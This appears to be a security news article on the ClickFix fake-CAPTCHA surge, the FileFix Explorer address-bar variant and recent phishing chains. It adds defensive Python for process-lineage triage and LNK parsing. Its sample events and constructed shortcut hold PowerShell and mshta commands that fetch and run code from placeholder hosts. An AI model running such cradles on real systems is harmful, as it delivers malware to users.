New FileFix Method Sparks Concern After 517% Surge in ClickFix Attacks


Rise of ClickFix: A New Security Threat

June 26, 2025, by Ravie Lakshmanan
Tags: Cyber Attack / Malware Analysis

Understanding ClickFix

ESET's latest threat report documents a sharp trend: ClickFix, a social engineering technique that usually hides behind a fake CAPTCHA verification page, grew 517% as an initial access vector between the second half of 2024 and the first half of 2025. Growth on that scale makes ClickFix a mainstream initial access technique rather than a curiosity, and one that user awareness programs and detection rules now need to cover.

According to Jiří Kropáč, Director of Threat Prevention Labs at ESET, the range of payloads delivered through ClickFix is widening quickly. Information stealers, ransomware, remote access trojans, cryptominers, post-exploitation tooling, and bespoke malware from state-sponsored actors have all been observed behind the same lure.

What is ClickFix?

ClickFix pages show a fake error message or CAPTCHA check and tell the user that the "fix" or "verification" is to paste a command the page has already placed on the clipboard. On Windows the instructions typically point to the Run dialog; on macOS they point to the Terminal app. Because the user performs the execution, no exploit or downloaded file is needed, and the payload never passes through the controls that inspect attachments.

ESET's telemetry puts Japan, Peru, Poland, Spain, and Slovakia among the countries most affected. The technique's success has also created a market: actors now advertise builder tools that generate ClickFix-weaponized landing pages for other attackers, which amplifies its reach.

Introducing FileFix: A New Tactic

Security researcher mrd0x recently published a proof-of-concept variant named FileFix. It tricks users into executing a command not through the Run dialog but through the address bar of Windows File Explorer, under the pretext of opening a shared file path.

FileFix rests on the same principle as ClickFix but changes the execution surface. The File Explorer address bar accepts executable commands as well as folder paths, so an attacker only needs a pretext that persuades the user to paste a string there and press Enter.

How FileFix Works

In the scenario mrd0x describes, a phishing page tells the user that a document has been shared with them. It instructs them to press CTRL + L, which focuses the address bar, and paste the file path that the page claims will open the shared content.

The page also offers a prominent "Open File Explorer" button. Clicking it opens File Explorer and, at the same time, writes a malicious PowerShell command to the clipboard. When the user pastes what they believe is a file path and presses Enter, the address bar executes the command instead, and the attack proceeds with no further interaction.
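Both the ClickFix flow described under "What is ClickFix?" and the FileFix flow above end the same way: a shell is spawned from a prompt owned by explorer.exe (the Run dialog or the File Explorer address bar), with a command line that hides its window, carries an encoded payload, or fetches a second stage over HTTP. The following Python is an added triage example written for this article; it is not code from ESET, mrd0x or any campaign the article reports on. It runs over constructed process-creation records shaped like Sysmon Event ID 1 fields; the hostnames are placeholders, and the inclusion of browser processes as possible parents is an assumption, in case a FileFix lure's file dialog is spawned by the browser rather than by explorer.exe.

```python
"""
Added triage helper for ClickFix / FileFix process lineage (example code
written for this article, not part of the ESET or mrd0x material).
"""
import base64
import re
from typing import Optional

# Parents a human-pasted command would have.  explorer.exe covers the Run
# dialog and the Explorer address bar.  The browsers are an assumption added
# here, in case a FileFix lure's file dialog is spawned by the browser.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

INDICATORS = {
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+h(?:idden)?\b"),
    # Any prefix of -EncodedCommand followed by a base64 token.
    "encoded_command": re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})"),
    "download_cradle": re.compile(
        r"(?i)\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|curl)\b.*https?://"),
    "inline_eval": re.compile(r"(?i)\b(?:iex|Invoke-Expression)\b"),
    "mshta_remote": re.compile(r"(?i)\bmshta(?:\.exe)?\s+https?://"),
}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE)."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> Optional[dict]:
    """Return a finding for a suspicious interactively spawned shell, else None."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    if parent not in INTERACTIVE_PARENTS or child not in SHELLS:
        return None
    cmdline = event["CommandLine"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        # The cradle is usually only visible after decoding, so scan again.
        hits += [f"decoded:{name}" for name, rx in INDICATORS.items()
                 if name != "encoded_command" and rx.search(decoded)]
    if not hits:
        return None
    return {"parent": parent, "child": child, "indicators": hits, "decoded": decoded}


# Constructed sample events.  Hostnames are placeholders, not real infrastructure.
_PAYLOAD = "iex (iwr https://docs-share.example/d.ps1)"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": 'powershell -w hidden -c "iex (irm https://captcha-check.example/verify)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": f"powershell.exe -ep bypass -enc {_ENC}"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://docs-share.example/open.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": "powershell.exe"},                      # user opened a console
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": _PS,
     "CommandLine": f"powershell.exe -enc {_ENC}"},         # service-spawned, out of scope here
]


def run_samples() -> list:
    """Triage the constructed events; only the first three should fire."""
    return [triage(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for finding in run_samples():
        print(finding)
```

The parent filter is what ties the rule to these lures: an encoded PowerShell command under services.exe is a different hunt, while the same command under explorer.exe with no preceding script file is almost always a paste. Decoding the -EncodedCommand value before matching matters because the download cradle is invisible in the raw command line.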

Evolving Phishing Campaigns

The surge in ClickFix has coincided with a broader diversification of phishing campaigns. Recent examples use a range of lures and delivery chains to compromise users' information:

  • Government Domain Phishing: Some scams send from or link to .gov domains so the message appears official, then harvest personal and financial details.

  • Strategic Domain Aging: Attackers register domains long before using them, so the domains carry an established reputation, then host custom CAPTCHA pages on them that redirect victims to counterfeit Microsoft Teams pages built to steal login credentials.

  • Malicious File Distribution: ZIP archives contain Windows shortcut (LNK) files whose target runs PowerShell commands that install the Remcos RAT.

  • Urgent Email Alerts: Emails warning that a mailbox is full push recipients to click links that lead to phishing sites; the same lure is also used with infected attachments that deploy the XWorm malware.

  • Multi-Stage URL Chains: Links lead to a PDF that itself links to a ZIP archive; the archive holds an executable that launches malware such as the AutoIT-based Lumma Stealer.

  • Impersonating Government Entities: SMS messages posing as a state Department of Motor Vehicles cite unpaid tolls and redirect victims to fraudulent sites that collect sensitive information.

  • Exploiting SharePoint: SharePoint-themed emails redirect users to credential-harvesting pages hosted on domains that mimic Microsoft services, which security software is less likely to flag.
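The LNK delivery chain in the list above (a shortcut inside a ZIP whose target runs PowerShell) is the kind of artifact an analyst wants to read without double-clicking it. The following Python is an added example written for this article, not code from any vendor or campaign it reports on: a minimal parser for the Shell Link format as documented in Microsoft's [MS-SHLLINK] specification, enough to pull the target, arguments, and ShowCommand out of a shortcut and flag the traits a malicious one typically shows. The sample shortcut is constructed inside the block by build_sample_lnk(); it is not a real campaign artifact, and its hostname is a placeholder.

```python
"""
Added example: minimal [MS-SHLLINK] parser for LNK triage (written for this
article, not taken from any vendor or campaign).  Layout: a 76-byte
ShellLinkHeader, optional LinkTargetIDList, optional LinkInfo, then StringData
entries in a fixed order, each a 2-byte character count followed by the
characters (UTF-16LE when the IsUnicode flag is set, otherwise ANSI).
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
STRING_DATA_ORDER = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                     ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                     ("icon_location", HAS_ICON_LOCATION)]
SW_NAMES = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}


def parse_lnk(data: bytes) -> dict:
    """Return header flags, ShowCommand and every StringData string present."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize excludes its own field
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]      # LinkInfoSize includes its own field
    info = {"flags": flags, "show_command": SW_NAMES.get(show_cmd, str(show_cmd))}
    for key, bit in STRING_DATA_ORDER:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return info


def triage_lnk(data: bytes) -> dict:
    """Parse and flag the traits a malicious shortcut typically shows."""
    info = parse_lnk(data)
    target = info.get("relative_path", "").lower()
    args = info.get("arguments", "")
    findings = []
    if any(t in target for t in ("powershell", "cmd.exe", "mshta", "wscript", "cscript")):
        findings.append("scripting host target")
    if "-w hidden" in args.lower() or "-windowstyle hidden" in args.lower():
        findings.append("hidden window")
    if "http://" in args or "https://" in args:
        findings.append("remote payload in arguments")
    if info["show_command"] == "SW_SHOWMINNOACTIVE":
        findings.append("runs minimized")
    info["findings"] = findings
    return info


def build_sample_lnk(unicode: bool = True, with_id_list: bool = False) -> bytes:
    """Constructed sample: a shortcut to powershell.exe carrying a download cradle."""
    strings = {
        "relative_path": r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "working_dir": r"C:\Users\Public",
        "arguments": '-w hidden -nop -c "iex (irm https://invoice-review.example/p.ps1)"',
        "icon_location": r"%SystemRoot%\System32\shell32.dll",
    }
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION
    flags |= IS_UNICODE if unicode else 0
    flags |= HAS_LINK_TARGET_ID_LIST if with_id_list else 0
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags)
    header += struct.pack("<I", 0x20) + b"\x00" * 24        # FILE_ATTRIBUTE_ARCHIVE, three zero FILETIMEs
    header += struct.pack("<IIIHHII", 0, 0, 7, 0, 0, 0, 0)  # FileSize, IconIndex, ShowCommand=7, HotKey, reserved
    body = b""
    if with_id_list:
        id_list = struct.pack("<H", 4) + b"\x1f\x50" + b"\x00\x00"  # one 4-byte ItemID, then TerminalID
        body += struct.pack("<H", len(id_list)) + id_list
    for key, bit in STRING_DATA_ORDER:
        if flags & bit:
            s = strings[key]
            body += struct.pack("<H", len(s)) + (s.encode("utf-16-le") if unicode else s.encode("cp1252"))
    return header + body


if __name__ == "__main__":
    print(triage_lnk(build_sample_lnk()))
```

The parser stops after StringData, which is all a triage needs; ExtraData blocks that follow it (environment variables, tracker data) are left unread. ShowCommand is worth surfacing on its own: a value of 7 (SW_SHOWMINNOACTIVE) starts the target minimized, which is how a shortcut keeps the PowerShell console off the screen while the cradle runs.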

CyberProof notes that emails carrying SharePoint links tend to evade detection because both users and filters treat a Microsoft-hosted link as trustworthy. The phishing pages sit on dynamic SharePoint sites and are often reachable only through specific links for a limited time, which complicates both detection and takedown.

